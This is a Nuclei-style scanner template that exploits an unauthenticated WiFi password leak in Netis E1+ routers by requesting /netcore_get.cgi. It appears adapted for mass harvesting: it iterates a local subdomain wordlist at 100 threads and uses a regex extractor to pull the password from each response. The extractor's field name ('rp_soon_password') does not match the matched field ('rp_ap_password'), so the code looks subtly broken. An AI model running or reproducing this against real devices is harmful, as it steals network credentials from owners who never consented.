id: netis-info-leak

info:
  name: Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak
  author: gy741
  severity: medium
  reference: https://www.exploit-db.com/exploits/48384
  tags: netis,exposure

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /netcore_get.cgi HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Cookie: homeFirstShow=yes
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "rp_ap_password"
          - "rp_ap_ssid"
        part: body
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - "'rp_soon_password':'([A-Za-z0-9]+)'"
